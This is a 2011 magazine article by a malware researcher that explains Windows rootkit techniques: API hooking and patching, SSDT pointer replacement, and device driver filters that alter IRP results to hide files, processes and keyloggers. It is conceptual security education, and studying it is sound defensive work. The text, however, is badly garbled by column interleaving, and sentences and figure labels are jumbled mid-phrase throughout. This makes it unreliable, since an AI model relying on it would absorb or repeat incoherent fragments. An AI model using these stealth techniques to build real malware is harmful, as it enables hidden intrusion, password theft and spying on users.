hacker inside the system from instruction named “Sysenter” - System Operating Systemadministrators, file monitors and firewalls. Enter, to call a specific function in theSome of the hiding techniques are hiding operating system.files in the hard disk, a connection port, 2. Patching and Hooking: Hardware Devicessome registry keys or a running process Hooking is a term given to the processin the machine. of intercepting or interrupting a call to aFurthermore, some other rootkits are system function like zwQueryDirectory It is created to be non-sensitive of the that do everything like managing filesespecially created for other needs, like File. Some examples are query files,keystroke monitor (keyboard spy), or which either function as modifiers to the hardware changes, to support multiple and directories, internet, connectivitypacket sniffer, which is a program that input (the path to a certain folder whose users and processes (applications), and so on.monitors all the data that is sent or files need to be queried), or modifiers to and to support system security from In order to understand the tricks of thereceived in the computer in order to steal the output (deleting the name of a specific malformed processes and from users to rootkits, the way the interface workspasswords or credit cards. file in order to hide it). users. should be first understood. Thus, Patching, in like manner, is very similar It supports a static interface between the life cycle of executing an API like3. Some Definitions: to hooking. Patching means modifying; applications and hardware devices called “FindFirstFileA()” from user-mode to1. User-mode Vs. Kernel-mode: modifying the first instructions of a specific Application Programming Interface (API). kernel-mode, to the device itself is shownThe computer processor has some type function to hook the inputs or the outputs This interface includes many functions below in this figure. of this function. Step By Step 26 27 April/june 2011
  14. 14. to change the inputs, as the IRPs were or Packet Sniffers, could communicate to Execute SYSENTER FindFirstFile() Calls to Call To Function instruction with Function first received, and have the ability to set a the device directly to receive the pressed ZwQueryDirectoryFile FindFirstFile() Number (0x91) function named “IOCompletionRoutine”. keys or send an internet packet by User Mode The IoCompletionRoutine is executed passing with this way and software filters Kernel Mode after completing the request and before or any hooker. returning to user or the user-mode This part is very sensitive to the changes Search For Function Send an IRP Request to Execute fastfat.sys (and All application. of the hardware, which is a very hard task (0x91) in The System Service Dispatch Table ntQueryDirectoryFile() Device drivers attached IoCompletionRoutine has the ability to to work on, and (SSDT) to it) change the outputs of this request in actually it is only used by the elite hackers order to hide files, for example, or make as most people say. any other changes. sending signal to the Attached Devices Drivers Attached Devices could In a like manner, the rootkits have the Conclusion: device and gets the could set IoCompletion change the inputs of the ability to filter the inputs and the outputs The rootkit is considered a programme output /execute the Routine to change The IRP request of any request. or a tool that gives the root privileges IoCompletion Routines outputs (Preoperation Mode) and return to user (postoperation mode) Regarding the last example, the rootkit to be used for the purpose of hiding the could change the results of this query to presence of a specific virus or spyware. Each step is explained, in addition to the hooking mechanism that is used by rootkits. hide a file or change its This tool uses the hooking mechanism to1.User-Mode Part: a pointer to another function (for name in the results of QueryDirectory filter the inputs or outputs of the systemAt the user-mode, the applications have the last example NtQueryDirectoryFile()) IRP. functions, either in a user-mode or kernel-the ability to call a function of hundreds of and then calls to this function and the 4. Communicating With Devices: mode, to hide the malware process. Byfunctions in the Windows’ interface (APIs), execution in the kernelmode After the device driver gets the IRP, the same token, it can hide files fromand as it is seen in the last example, continues. the device driver communicates with the outputs of any query as if there is nothe application calls to FindFirstFileA(), At this part, the kernel-mode rootkits, the related device, the Hard Desk for malware in the computer.which calls to another API named as explained above, have the ability to instance, by sending signals to this device Some other rootkits use these privilegesZwQueryDirectoryFile(), which calls to change the pointer to a function in the or receiving signals from it. to log the key presses or sniff the internetKiFastSystemCall(), which executes a SSDT array with another function inside After getting the reply from the device, the packets to steal passwords or intrude onprocessor instruction “Sysenter” that the kernel-mode rootkit. device driver changes the output to the someone’s privates.converts you from user-mode to kernel- Additionally, other rootkits prefer to standard shape for windows or converts It is also described above in this articlemode and executes another function in hook these functions by patching its first the output into a more higher level and the life system cycle to execute a systemthe system in the kernel-mode named instructions like the usermode then returns to the user-mode application query from the usermode to the kernel-KiSystemService() rootkits. after calling to IoCompletionRoutine. mode to the hardware devices to reply toAt this part, the user-mode rootkits, as 3. Device Drivers: In this stage, the rootkits cannot hook the someone’s request in a high level replypreviously explained, have the ability to After executing ntQueryDirectoryFile() signals to the devices, but some rootkits with the transparency of the hardwarehook one of these functions by patching function, this function sends to the with another tasks, such as Key Loggers changes.its first instructions by another which related device driver a request named About the author: I’m Amr Thabet. I’m a Freelancer Malware Researcher and a student atallows the rootkit to change the inputs or “I/O Request Packet (IRP)” to query on Alexandria University faculty of engineering in the last year.the outputs of these functions. a specific directory. This packet will be I’m the Author of Pokas x86 Emulator, a speaker in Cairo Security Camp 2010 and invited to2. SSDT: received by the appreciate device driver become a speaker in Athcon Security Conference 2011 in Athens, Greece.While executing “Sysenter” instructions, I begin programming in 14. I read many books and researches in the malware, reversing and and all device drivers attached to it. antivirus fields and a I’m a reverser from nearby 4 years.the processor converts you into the Windows allows device drivers to bekernel-mode (ring-0), and executes attached to any device driver to filter References:KiSystemService() function which search its input, change its output or complete 1. Addison Wesley Professional Rootkits - Subverting the Windows Kernelin an array named “System Service the request without the need of the real 2. The Rootkit Arsenal : Escape and Evasion in the Dark Corners of the System, by ReverendDispatch Table (SSDT)” with the function device driver itself. Bill Blundennumber as an index in the array and gets These device driver filters have the ability 3. Rootkit - Wikipedia, the free encyclopedia, at this link: Step By Step 28 29 April/june 2011